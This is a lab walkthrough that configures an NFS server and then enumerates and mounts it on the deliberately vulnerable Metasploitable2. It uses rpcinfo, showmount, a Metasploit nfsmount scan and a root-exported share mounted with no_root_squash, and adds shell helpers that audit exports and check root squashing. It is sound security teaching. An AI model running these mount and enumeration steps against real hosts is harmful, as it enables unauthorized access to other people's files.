Metasploitable2: tcp port 111 - rpcbind

RPC & portmapper (port 111, on both TCP and UDP; the registered services themselves sit on other ports). The portmapper service works like this: when I connect to the portmapper port, I say which RPC service I want to use, and the portmapper tells me which port to use. (RPC is short for Remote Procedure Call; it is like calling a function on a remote host and getting its return value back.) The reverse also holds: if I want to write an RPC service, I must register it with the portmapper so that clients can find the port the service is listening on. Querying the portmapper therefore reveals which ports the services run on, which avoids the problems of a port scan, provided the portmapper service is running. So the host I want to test must first have port 111 open. Assuming a machine has the portmapper port open, the detection looks like the rpcinfo run in the exploitation section below.
Configuring the NFS service (building the lab server)

Lab environment:
root@linux:/exports# uname -a
Linux linux 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u3 x86_64 GNU/Linux

Switch to root:
su root

Install the required packages:
apt-get install nfs-kernel-server rpcbind nfs-common

vi /etc/default/rpcbind
OPTIONS=""

vi /etc/hosts.allow
# allow the local network 192.168.1.0/24
portmap: 192.168.1.0/24
(note: rpcbind consults hosts.allow under its own daemon name, rpcbind; the portmap name belongs to the legacy portmap daemon, so list both names if you want the restriction to apply)

vi /etc/default/nfs-common
# NFSv4 needs the idmapd process
NEED_IDMAPD=YES

vi /etc/idmapd.conf
[General]
Verbosity = 0
Pipefs-Directory = /var/lib/nfs/rpc_pipefs
Domain = localdomain
[Mapping]
Nobody-User = nobody
Nobody-Group = nogroup

vi /etc/exports
/exports 192.168.1.0/255.255.255.0(rw,no_root_squash,no_subtree_check,crossmnt,fsid=0)

no_root_squash is the option that makes this export dangerous: a client that is root locally keeps uid 0 on the export and can read or write anything under it. It is used here only because the lab is meant to be exploitable; the default, root_squash, maps the client's root to nobody/nogroup and should stay in place on any real server.

mkdir -p /exports/home
cd /exports
mount --bind /home ./home

vi /etc/fstab
/home /exports/home none bind

Start rpcbind before the NFS server, otherwise mountd and nfsd have nothing to register with:
/etc/init.d/rpcbind start
/etc/init.d/nfs-kernel-server start
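The exports line above is easy to misread, so here is an added example (not code from the original page or from the NFS project) that audits exports(5) lines for the settings that make an export dangerous: no_root_squash, a wildcard client, the insecure option, and rw. The sample file is constructed here; its first line is the lab's own export, the second is the same line with root_squash in place of no_root_squash, and the last one shows the classic "host (rw)" pitfall where the space turns the options into a separate entry that applies to everyone. Assumes POSIX awk.

```shell
# Constructed sample of an /etc/exports file (not a real server's file).
EXPORTS_SAMPLE='# lab export as configured above
/exports 192.168.1.0/255.255.255.0(rw,no_root_squash,no_subtree_check,crossmnt,fsid=0)
/exports-fixed 192.168.1.0/255.255.255.0(rw,root_squash,no_subtree_check,crossmnt,fsid=0)
/srv/public *(ro,sync,root_squash)
/srv/backup 10.0.0.5(rw,sync,root_squash,insecure)
/srv/oops 10.0.0.6 (rw)'

# audit_exports: read exports(5) lines on stdin and print one line per client
# entry: "<path> <client> <findings>", where findings is a comma-separated
# list drawn from WORLD (client is *), NO_ROOT_SQUASH, INSECURE (requests
# from ports above 1023 accepted) and RW, or OK when none apply.
audit_exports() {
    awk '
        /^[ \t]*(#|$)/ { next }                   # skip comments and blank lines
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                client = $i; opts = ""
                if (match(client, /\(.*\)$/)) {
                    opts = substr(client, RSTART + 1, RLENGTH - 2)
                    client = substr(client, 1, RSTART - 1)
                }
                # exports(5) pitfall: "host (rw)" with a space is two entries,
                # "host" with default options and "(rw)" granted to every host.
                if (client == "") client = "*"
                world = (client == "*"); noroot = 0; insecure = 0; rw = 0
                n = split(opts, o, ",")
                for (j = 1; j <= n; j++) {
                    if (o[j] == "no_root_squash") noroot = 1
                    if (o[j] == "insecure") insecure = 1
                    if (o[j] == "rw") rw = 1
                }
                f = ""
                if (world) f = f "WORLD,"
                if (noroot) f = f "NO_ROOT_SQUASH,"
                if (insecure) f = f "INSECURE,"
                if (rw) f = f "RW,"
                sub(/,$/, "", f)
                print path, client, (f == "" ? "OK" : f)
            }
        }'
}

# Usage: audit the sample, or a real file with `audit_exports < /etc/exports`.
printf '%s\n' "$EXPORTS_SAMPLE" | audit_exports
```

On the sample, the lab line is reported as NO_ROOT_SQUASH,RW, the corrected line as RW only, and the "/srv/oops 10.0.0.6 (rw)" line produces two entries, the second of which is WORLD,RW: exactly the mistake that silently exports a directory read-write to the whole network.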
Below is the process of using Metasploit against the NFS service on Metasploitable2.
msf > rpcinfo -p 192.168.1.111
[*] exec: rpcinfo -p 192.168.1.111

   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  51611  status
    100024    1   tcp  40742  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100021    1   udp  58205  nlockmgr
    100021    3   udp  58205  nlockmgr
    100021    4   udp  58205  nlockmgr
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100021    1   tcp  39384  nlockmgr
    100021    3   tcp  39384  nlockmgr
    100021    4   tcp  39384  nlockmgr
    100005    1   udp  52933  mountd
    100005    1   tcp  52457  mountd
    100005    2   udp  52933  mountd
    100005    2   tcp  52457  mountd
    100005    3   udp  52933  mountd
    100005    3   tcp  52457  mountd
From the output above we can see which RPC services the host is running. NFS (Network File System) is the one that attracts our attention. Perhaps we can see the host's shares; let's try:
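To make the portmapper lookup concrete, here is an added example (not code from the original page) that does, offline, what an RPC client does when it asks the portmapper for a service: it reads `rpcinfo -p` output and answers "which port is program X on protocol Y", and it lists every port the portmapper has handed out, which is the list a tester probes next instead of sweeping all 65535 ports. The listing from the run above is embedded as constructed sample input; the functions assume POSIX awk and sort.

```shell
# The rpcinfo -p output shown above, embedded as constructed sample input.
RPCINFO_SAMPLE='   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  51611  status
    100024    1   tcp  40742  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100021    1   udp  58205  nlockmgr
    100021    3   udp  58205  nlockmgr
    100021    4   udp  58205  nlockmgr
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100021    1   tcp  39384  nlockmgr
    100021    3   tcp  39384  nlockmgr
    100021    4   tcp  39384  nlockmgr
    100005    1   udp  52933  mountd
    100005    1   tcp  52457  mountd
    100005    2   udp  52933  mountd
    100005    2   tcp  52457  mountd
    100005    3   udp  52933  mountd
    100005    3   tcp  52457  mountd'

# rpc_port SERVICE PROTO [VERSION]: read rpcinfo -p output on stdin and print
# the port registered for SERVICE over PROTO (highest version unless VERSION
# is given). Returns 1 when nothing is registered, which is what a client gets
# from the portmapper for a program that never registered with it.
rpc_port() {
    awk -v svc="$1" -v proto="$2" -v want="${3:-}" '
        $1 ~ /^[0-9]+$/ && $5 == svc && $3 == proto && (want == "" || $2 == want) {
            if (port == "" || $2 + 0 > best) { best = $2 + 0; port = $4 }
        }
        END { if (port == "") exit 1; print port }'
}

# rpc_ports PROTO: sorted, de-duplicated list of every port the portmapper
# has registered for PROTO. Only these need probing; no scan required.
rpc_ports() {
    awk -v proto="$1" '$1 ~ /^[0-9]+$/ && $3 == proto { print $4 }' | sort -nu
}

# Usage: the same lookups an NFS client makes before talking to mountd/nfsd.
# Against a live host, replace the printf with: rpcinfo -p 192.168.1.111 | ...
printf '%s\n' "$RPCINFO_SAMPLE" | rpc_port nfs tcp        # 2049
printf '%s\n' "$RPCINFO_SAMPLE" | rpc_port mountd udp 1   # 52933
printf '%s\n' "$RPCINFO_SAMPLE" | rpc_ports tcp
```

The mountd port is the one `showmount` needs; nfs itself is on the fixed port 2049, while status, nlockmgr and mountd land on ephemeral ports that differ from host to host, which is why asking the portmapper beats guessing.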
root@gnu:~# showmount -a 192.168.1.111
All mount points on 192.168.1.111:
192.168.1.113:/
root@gnu:~# showmount -e 192.168.1.111
Export list for 192.168.1.111:
/ *
root@gnu:~# mount -t nfs 192.168.1.111:/ /mnt/nfs/ -o nolock
root@gnu:~# ls /mnt/nfs/
bin   cdrom  etc   initrd      lib         media  nohup.out  proc  sbin  sys  usr  vmlinuz
boot  dev    home  initrd.img  lost+found  mnt    opt        root  srv   tmp  var

showmount -a lists the clients that currently have something mounted (here 192.168.1.113 has / mounted), and showmount -e shows that the whole root filesystem / is exported to * , that is, to every host. The mount uses -o nolock so that it works without the NFS lock manager on the client. The listing is Metasploitable2's root filesystem, readable from our machine.
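Seeing the root filesystem is only half the story; what matters next is whether the server squashes root. Here is an added example (not code from the original page) that checks this on a mounted export: it creates a probe file, reads back the owner the server recorded and removes the probe. Run as root on the client against the mount point, for instance `check_root_squash /mnt/nfs`; with root_squash the file comes back owned by nobody (uid 65534), with no_root_squash, as the lab export is configured, uid 0 is preserved. It assumes GNU stat (Linux) and a mount point path supplied by you.

```shell
# check_root_squash DIR: report whether the current uid survives a write to
# DIR. Exit 0 when the owner recorded on the server equals our uid (no
# squashing), 1 when it was mapped to another uid (squashed), 2 when DIR is
# not writable at all.
check_root_squash() {
    dir=$1
    probe="$dir/.squash_probe.$$"
    me=$(id -u)
    if ! touch "$probe" 2>/dev/null; then
        echo "$dir: not writable as uid $me"
        return 2
    fi
    owner=$(stat -c %u "$probe")     # GNU stat: numeric owner uid
    rm -f "$probe"
    if [ "$owner" = "$me" ]; then
        echo "$dir: uid $me preserved (no squash)"
        return 0
    fi
    echo "$dir: uid $me written as uid $owner (squashed)"
    return 1
}

# Usage on the lab mount from above (as root): check_root_squash /mnt/nfs
```

Exit status 1 is the good answer from the defender's side: it means the server applied root_squash and our root is just nobody on the export. Exit status 0 as root confirms that the no_root_squash export lets the client's root act as root on the server's files.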
Metasploitable2: udp port 111 - portmapper

msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set RHOSTS 192.168.1.111
RHOSTS => 192.168.1.111
msf auxiliary(nfsmount) > run
[+] 192.168.1.111 NFS Export: / [*]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Recommended links:
NFS configuration: http://tutorialforlinux.com/2013/09/16/how-debian-share-files-over-network-easy-from-server-to-client-on-nfs4/